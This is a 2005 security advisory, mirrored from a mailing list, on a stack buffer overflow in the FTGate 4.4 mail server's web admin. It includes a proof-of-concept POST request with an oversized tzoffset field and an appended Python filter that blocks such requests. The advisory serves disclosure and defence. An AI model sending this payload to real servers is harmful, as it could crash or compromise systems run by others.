VUPEN Security / Public Mailing Lists Mirror
Assigned : VUPEN/ADV-2005-3010
From : Security Advisories <Security-Advisories at acs-inc.com>
Subject : [ACSSEC-2005-11-25-0x4] FTGate 4.4 [Build 4.4.000 Oct 26 2005] Stack Buffer Overflow
Date : 2005-12-20
Original Message
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Stack Buffer Overflow
ID: ACSSEC-2005-11-25 - 0x4
Class: Stack based Buffer Overflow
Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005]
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 20, 2005
Remote: Yes
Severity: Low
Credit: Tim Shelton <security-advisories_at_acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Background
FTGate4 is a powerful Windows(TM) communication suite that combines exceptional mail handling facilities with comprehensive Groupware functionality. Its security and collaboration features were developed in conjunction with leading ISP's and define a new era in mail server performance.
-=[ Technical Description
FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to a buffer overflow via a specially crafted POST request. A remote attacker could issue the vulnerable command followed by malicious code to execute arbitrary code.
-=[ Proof of Concepts
POST /index.fts HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; redsand)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: SessId=9b5cdbb1c3e1a06da4bf0789b25fe38a; modified=null; webadmin.remember=null; webadmin.username=null
Referer: http://127.0.0.1:8089/
Content-Type: application/x-www-form-urlencoded
Content-Length: 346

config=1&param1=&href=&tzoffset=11111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111
&admin=administrator%40example.com&password=test12345
An overflow can be found at the variable tzoffset=[OVERFLOW]
-=[ Solution
No remedy available as of December 2005.
-=[ Credits
Vulnerability originally reported by Tim Shelton
-=[ ChangeLog
2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : No response from vendor, disclosing full information.
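
With no vendor fix available, one interim control is to screen form POSTs before they reach the web admin interface. The check below is an added example, not part of the original advisory or of FTGate; the 128-character field cap, the integer pattern for tzoffset and all function names are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl

# Assumed policy (not from the advisory): a timezone offset is a short signed
# integer, and no form field needs more than 128 characters.
TZOFFSET_RE = re.compile(r"[+-]?\d{1,4}")
MAX_FIELD_LEN = 128

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def inspect_request(raw: bytes):
    """Return a list of findings; an empty list means the request passes."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    if method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    findings = []
    # Lengths are measured after percent-decoding, as the server would see them.
    for name, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True):
        if len(value) > MAX_FIELD_LEN:
            findings.append(f"{path}: field {name!r} is {len(value)} chars (limit {MAX_FIELD_LEN})")
        elif name == "tzoffset" and value and not TZOFFSET_RE.fullmatch(value):
            findings.append(f"{path}: tzoffset is not a short signed integer")
    return findings

def build_request(tzoffset: str) -> bytes:
    """Constructed sample using the form fields shown in the advisory's request."""
    body = (f"config=1&param1=&href=&tzoffset={tzoffset}"
            "&admin=administrator%40example.com&password=test12345")
    return ("POST /index.fts HTTP/1.1\r\nHost: 127.0.0.1:8089\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode("latin-1")

if __name__ == "__main__":
    for sample in (build_request("-300"), build_request("1" * 256)):
        print(inspect_request(sample) or "ok")
```

The same two rules translate directly into a reverse-proxy or WAF policy placed in front of the admin port.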